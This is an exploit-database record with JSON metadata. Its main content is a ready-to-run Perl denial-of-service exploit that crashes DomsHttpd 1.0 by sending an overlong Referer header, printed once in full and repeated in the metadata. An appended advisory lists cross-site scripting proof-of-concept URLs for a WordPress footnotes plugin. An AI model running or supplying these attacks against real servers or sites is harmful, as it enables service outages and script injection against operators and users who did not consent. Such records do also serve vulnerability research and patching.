ID 1337DAY-ID-18998
Type zdt
Reporter Jean Pascal Pereira
Modified 2012-07-16T00:00:00
Description
Exploit for windows platform in category dos / poc
#!/usr/bin/perl
# DomsHttpd 1.0 <= Remote Denial Of Service Exploit
# Credit: Jean Pascal Pereira <[email protected]>
# Usage: domshttpd.pl [host] [port]
use strict;
use warnings;
use IO::Socket;
my $host = shift || "localhost";
my $port = shift || 88;
my $sock = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => $port
);
my $junk = "A"x3047;
print $sock "POST / HTTP/1.1\r\nHost: ".$host."\r\nConnection: close\r\nUser-Agent: Mozilla\r\nReferer: http://".$host."/".$junk."\r\n\r\n";
sleep 4;
close($sock);
# 0day.today [2018-01-09] #
{"hash": "51b7db16fbc66c6bd717198e6220d7c7d618bca982606045e02d02a1ea521f78", "id": "1337DAY-ID-18998", "lastseen": "2018-01-09T21:19:18", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b0d3d3a91f21189719037cf41ad6dbfa", "key": "description"}, {"hash": "06a414e23f4f5ac5c728ab93803f2b71", "key": "href"}, {"hash": "665633b7771cb538f31a1452b11184a9", "key": "modified"}, {"hash": "665633b7771cb538f31a1452b11184a9", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9a74e0973947f543c2233458d50da951", "key": "reporter"}, {"hash": "7eb138f064b3c19441efff5c02b5992f", "key": "sourceData"}, {"hash": "499316ee93f918547a033c28d2b4138b", "key": "sourceHref"}, {"hash": "8a2b93eb6c93478f859d3031b0e255b6", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2018-01-09T21:19:18"}, "dependencies": {"references": [{"type": "debian", "idList": ["DEBIAN:BSA-015:8A1C1"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:18998"]}], "modified": "2018-01-09T21:19:18"}, "vulnersScore": 0.1}, "type": "zdt", "sourceHref": "https://0day.today/exploit/18998", "description": "Exploit for windows platform in category dos / poc", "title": "DomsHttpd 1.0 <= Remote Denial Of Service Exploit", "history": [{"bulletin": {"hash": "e82f8e745acdd56f22be84cca4ab2f5defa5feeb69560fe14896d40c51c7a0c6", "id": "1337DAY-ID-18998", "lastseen": "2016-04-20T02:01:56", "enchantments": {"score": {"value": 5.7, "modified": "2016-04-20T02:01:56"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "660feed9f8983f8de29e38aaad468690", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "665633b7771cb538f31a1452b11184a9", "key": "published"}, {"hash": "8a2b93eb6c93478f859d3031b0e255b6", "key": "title"}, {"hash": "9a74e0973947f543c2233458d50da951", "key": "reporter"}, {"hash": "b0d3d3a91f21189719037cf41ad6dbfa", "key": "description"}, {"hash": "665633b7771cb538f31a1452b11184a9", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "27754cbbafff42f9b8ad7691c3217c61", "key": "href"}, {"hash": "9c2faae71cb21b8f19c76ae594cc09e3", "key": "sourceHref"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/18998", "description": "Exploit for windows platform in category dos / poc", "viewCount": 0, "title": "DomsHttpd 1.0 <= Remote Denial Of Service Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "#!/usr/bin/perl\r\n \r\n# DomsHttpd 1.0 <= Remote Denial Of Service Exploit\r\n \r\n# Credit: Jean Pascal Pereira <pereira@secbiz.de>\r\n \r\n# Usage: domshttpd.pl [host] [port]\r\n \r\nuse strict;\r\nuse warnings;\r\nuse IO::Socket;\r\n \r\nmy $host = shift || \"localhost\";\r\nmy $port = shift || 88;\r\n \r\nmy $sock = IO::Socket::INET->new( Proto => \"tcp\",\r\n PeerAddr => $host,\r\n PeerPort => $port\r\n);\r\n \r\n \r\nmy $junk = \"A\"x3047;\r\n \r\nprint $sock \"POST / HTTP/1.1\\r\\nHost: \".$host.\"\\r\\nConnection: close\\r\\nUser-Agent: Mozilla\\r\\nReferer: http://\".$host.\"/\".$junk.\"\\r\\n\\r\\n\";\r\n \r\nsleep 4;\r\n \r\nclose($sock);\r\n\r\n\n\n# 0day.today [2016-04-20] #", "published": "2012-07-16T00:00:00", "references": [], "reporter": "Jean Pascal Pereira", "modified": "2012-07-16T00:00:00", "href": "http://0day.today/exploit/description/18998"}, "lastseen": "2016-04-20T02:01:56", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "#!/usr/bin/perl\r\n \r\n# DomsHttpd 1.0 <= Remote Denial Of Service Exploit\r\n \r\n# Credit: Jean Pascal Pereira <[email\u00a0protected]>\r\n \r\n# Usage: domshttpd.pl [host] [port]\r\n \r\nuse strict;\r\nuse warnings;\r\nuse IO::Socket;\r\n \r\nmy $host = shift || \"localhost\";\r\nmy $port = shift || 88;\r\n \r\nmy $sock = IO::Socket::INET->new( Proto => \"tcp\",\r\n PeerAddr => $host,\r\n PeerPort => $port\r\n);\r\n \r\n \r\nmy $junk = \"A\"x3047;\r\n \r\nprint $sock \"POST / HTTP/1.1\\r\\nHost: \".$host.\"\\r\\nConnection: close\\r\\nUser-Agent: Mozilla\\r\\nReferer: http://\".$host.\"/\".$junk.\"\\r\\n\\r\\n\";\r\n \r\nsleep 4;\r\n \r\nclose($sock);\r\n\r\n\n\n# 0day.today [2018-01-09] #", "published": "2012-07-16T00:00:00", "references": [], "reporter": "Jean Pascal Pereira", "modified": "2012-07-16T00:00:00", "href": "https://0day.today/exploit/description/18998"}
{"securityvulns": [{"lastseen": "2018-08-31T11:09:28", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2008-02-03T00:00:00", "published": "2008-02-03T00:00:00", "id": "SECURITYVULNS:VULN:8627", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8627", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:24", "bulletinFamily": "software", "description": "################################################################\r\nWordpress Plugin wp-footnotes 2.2 admin_panel.php Multiple Vulnerabilities\r\nFounded: 1st, February 2008 Founder: NBBN\r\n################################################################\r\n\r\n1) No Access Control.\r\n\r\nAn attacker can access the adminpanel of the footnotes. \r\n\r\nhttp://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php\r\n\r\nThe result -> Many XSS Vulnerabilities. because no defines of variables. And \r\nhe can add his own code on the blog footer.\r\n\r\n\r\n2) Multiple XSS Vuln's (Register Globals: ON)\r\n\r\nhttp://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_footnotes_current_settings[priority]="><script>alert("XSS")</script>\r\n\r\nhttp://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_footnotes_current_settings[style_rules]=</textarea><script>alert("XSS")</script>\r\n\r\nhttp://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current_settings[pre_footnotes]=</textarea><script>alert("XSS")</script>\r\n\r\nhttp://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current_settings[post_footnotes]=</textarea><script>alert(":-(")", "modified": "2008-02-03T00:00:00", "published": "2008-02-03T00:00:00", "id": "SECURITYVULNS:DOC:18998", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18998", "title": "Wordpress Pluging wp-footnotes 2.2 (admin_panel.php) Multiple Vulnerabilites", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
